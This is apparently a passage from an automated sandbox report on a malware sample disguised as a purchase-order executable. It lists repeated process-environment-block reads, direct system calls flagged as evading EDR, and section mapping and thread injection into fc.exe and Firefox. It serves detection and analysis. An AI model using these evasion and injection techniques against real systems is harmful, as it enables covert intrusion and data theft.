              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015529A0 mov eax, dword ptr fs:[00000030h]0_2_015529A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015409AD mov eax, dword ptr fs:[00000030h]0_2_015409AD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015409AD mov eax, dword ptr fs:[00000030h]0_2_015409AD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01570854 mov eax, dword ptr fs:[00000030h]0_2_01570854
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01544859 mov eax, dword ptr fs:[00000030h]0_2_01544859
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01544859 mov eax, dword ptr fs:[00000030h]0_2_01544859
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01552840 mov ecx, dword ptr fs:[00000030h]0_2_01552840
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D6870 mov eax, dword ptr fs:[00000030h]0_2_015D6870
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D6870 mov eax, dword ptr fs:[00000030h]0_2_015D6870
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CE872 mov eax, dword ptr fs:[00000030h]0_2_015CE872
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CE872 mov eax, dword ptr fs:[00000030h]0_2_015CE872
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CC810 mov eax, dword ptr fs:[00000030h]0_2_015CC810
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01562835 mov eax, dword ptr fs:[00000030h]0_2_01562835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01562835 mov eax, dword ptr fs:[00000030h]0_2_01562835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01562835 mov eax, dword ptr fs:[00000030h]0_2_01562835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01562835 mov ecx, dword ptr fs:[00000030h]0_2_01562835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01562835 mov eax, dword ptr fs:[00000030h]0_2_01562835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01562835 mov eax, dword ptr fs:[00000030h]0_2_01562835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E483A mov eax, dword ptr fs:[00000030h]0_2_015E483A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E483A mov eax, dword ptr fs:[00000030h]0_2_015E483A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157A830 mov eax, dword ptr fs:[00000030h]0_2_0157A830
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160A8E4 mov eax, dword ptr fs:[00000030h]0_2_0160A8E4
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156E8C0 mov eax, dword ptr fs:[00000030h]0_2_0156E8C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_016108C0 mov eax, dword ptr fs:[00000030h]0_2_016108C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157C8F9 mov eax, dword ptr fs:[00000030h]0_2_0157C8F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157C8F9 mov eax, dword ptr fs:[00000030h]0_2_0157C8F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CC89D mov eax, dword ptr fs:[00000030h]0_2_015CC89D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01540887 mov eax, dword ptr fs:[00000030h]0_2_01540887
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EEB50 mov eax, dword ptr fs:[00000030h]0_2_015EEB50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F4B4B mov eax, dword ptr fs:[00000030h]0_2_015F4B4B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F4B4B mov eax, dword ptr fs:[00000030h]0_2_015F4B4B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015E8B42 mov eax, dword ptr fs:[00000030h]0_2_015E8B42
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D6B40 mov eax, dword ptr fs:[00000030h]0_2_015D6B40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015D6B40 mov eax, dword ptr fs:[00000030h]0_2_015D6B40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0160AB40 mov eax, dword ptr fs:[00000030h]0_2_0160AB40
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0153CB7E mov eax, dword ptr fs:[00000030h]0_2_0153CB7E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01612B57 mov eax, dword ptr fs:[00000030h]0_2_01612B57
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01612B57 mov eax, dword ptr fs:[00000030h]0_2_01612B57
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01612B57 mov eax, dword ptr fs:[00000030h]0_2_01612B57
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01612B57 mov eax, dword ptr fs:[00000030h]0_2_01612B57
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BEB1D mov eax, dword ptr fs:[00000030h]0_2_015BEB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BEB1D mov eax, dword ptr fs:[00000030h]0_2_015BEB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BEB1D mov eax, dword ptr fs:[00000030h]0_2_015BEB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BEB1D mov eax, dword ptr fs:[00000030h]0_2_015BEB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BEB1D mov eax, dword ptr fs:[00000030h]0_2_015BEB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BEB1D mov eax, dword ptr fs:[00000030h]0_2_015BEB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BEB1D mov eax, dword ptr fs:[00000030h]0_2_015BEB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BEB1D mov eax, dword ptr fs:[00000030h]0_2_015BEB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BEB1D mov eax, dword ptr fs:[00000030h]0_2_015BEB1D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01608B28 mov eax, dword ptr fs:[00000030h]0_2_01608B28
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01608B28 mov eax, dword ptr fs:[00000030h]0_2_01608B28
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156EB20 mov eax, dword ptr fs:[00000030h]0_2_0156EB20
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156EB20 mov eax, dword ptr fs:[00000030h]0_2_0156EB20
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EEBD0 mov eax, dword ptr fs:[00000030h]0_2_015EEBD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01540BCD mov eax, dword ptr fs:[00000030h]0_2_01540BCD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01540BCD mov eax, dword ptr fs:[00000030h]0_2_01540BCD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01540BCD mov eax, dword ptr fs:[00000030h]0_2_01540BCD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01560BCB mov eax, dword ptr fs:[00000030h]0_2_01560BCB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01560BCB mov eax, dword ptr fs:[00000030h]0_2_01560BCB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01560BCB mov eax, dword ptr fs:[00000030h]0_2_01560BCB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01548BF0 mov eax, dword ptr fs:[00000030h]0_2_01548BF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01548BF0 mov eax, dword ptr fs:[00000030h]0_2_01548BF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01548BF0 mov eax, dword ptr fs:[00000030h]0_2_01548BF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156EBFC mov eax, dword ptr fs:[00000030h]0_2_0156EBFC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CCBF0 mov eax, dword ptr fs:[00000030h]0_2_015CCBF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550BBE mov eax, dword ptr fs:[00000030h]0_2_01550BBE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550BBE mov eax, dword ptr fs:[00000030h]0_2_01550BBE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F4BB0 mov eax, dword ptr fs:[00000030h]0_2_015F4BB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015F4BB0 mov eax, dword ptr fs:[00000030h]0_2_015F4BB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01546A50 mov eax, dword ptr fs:[00000030h]0_2_01546A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01546A50 mov eax, dword ptr fs:[00000030h]0_2_01546A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01546A50 mov eax, dword ptr fs:[00000030h]0_2_01546A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01546A50 mov eax, dword ptr fs:[00000030h]0_2_01546A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01546A50 mov eax, dword ptr fs:[00000030h]0_2_01546A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01546A50 mov eax, dword ptr fs:[00000030h]0_2_01546A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01546A50 mov eax, dword ptr fs:[00000030h]0_2_01546A50
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550A5B mov eax, dword ptr fs:[00000030h]0_2_01550A5B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01550A5B mov eax, dword ptr fs:[00000030h]0_2_01550A5B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BCA72 mov eax, dword ptr fs:[00000030h]0_2_015BCA72
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015BCA72 mov eax, dword ptr fs:[00000030h]0_2_015BCA72
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157CA6F mov eax, dword ptr fs:[00000030h]0_2_0157CA6F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157CA6F mov eax, dword ptr fs:[00000030h]0_2_0157CA6F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157CA6F mov eax, dword ptr fs:[00000030h]0_2_0157CA6F
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015EEA60 mov eax, dword ptr fs:[00000030h]0_2_015EEA60
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015CCA11 mov eax, dword ptr fs:[00000030h]0_2_015CCA11
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01564A35 mov eax, dword ptr fs:[00000030h]0_2_01564A35
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01564A35 mov eax, dword ptr fs:[00000030h]0_2_01564A35
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157CA38 mov eax, dword ptr fs:[00000030h]0_2_0157CA38
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157CA24 mov eax, dword ptr fs:[00000030h]0_2_0157CA24
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0156EA2E mov eax, dword ptr fs:[00000030h]0_2_0156EA2E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01540AD0 mov eax, dword ptr fs:[00000030h]0_2_01540AD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01574AD0 mov eax, dword ptr fs:[00000030h]0_2_01574AD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01574AD0 mov eax, dword ptr fs:[00000030h]0_2_01574AD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01596ACC mov eax, dword ptr fs:[00000030h]0_2_01596ACC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01596ACC mov eax, dword ptr fs:[00000030h]0_2_01596ACC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01596ACC mov eax, dword ptr fs:[00000030h]0_2_01596ACC
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157AAEE mov eax, dword ptr fs:[00000030h]0_2_0157AAEE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0157AAEE mov eax, dword ptr fs:[00000030h]0_2_0157AAEE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01578A90 mov edx, dword ptr fs:[00000030h]0_2_01578A90
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154EA80 mov eax, dword ptr fs:[00000030h]0_2_0154EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154EA80 mov eax, dword ptr fs:[00000030h]0_2_0154EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154EA80 mov eax, dword ptr fs:[00000030h]0_2_0154EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154EA80 mov eax, dword ptr fs:[00000030h]0_2_0154EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154EA80 mov eax, dword ptr fs:[00000030h]0_2_0154EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154EA80 mov eax, dword ptr fs:[00000030h]0_2_0154EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154EA80 mov eax, dword ptr fs:[00000030h]0_2_0154EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154EA80 mov eax, dword ptr fs:[00000030h]0_2_0154EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_0154EA80 mov eax, dword ptr fs:[00000030h]0_2_0154EA80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01614A80 mov eax, dword ptr fs:[00000030h]0_2_01614A80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01548AA0 mov eax, dword ptr fs:[00000030h]0_2_01548AA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01548AA0 mov eax, dword ptr fs:[00000030h]0_2_01548AA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01596AA4 mov eax, dword ptr fs:[00000030h]0_2_01596AA4
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01540D59 mov eax, dword ptr fs:[00000030h]0_2_01540D59
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01540D59 mov eax, dword ptr fs:[00000030h]0_2_01540D59

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtClose: Direct from: 0x77382B6C
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeSection loaded: NULL target: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 2360Jump to behavior
              Queues an APC in another process (thread injection)
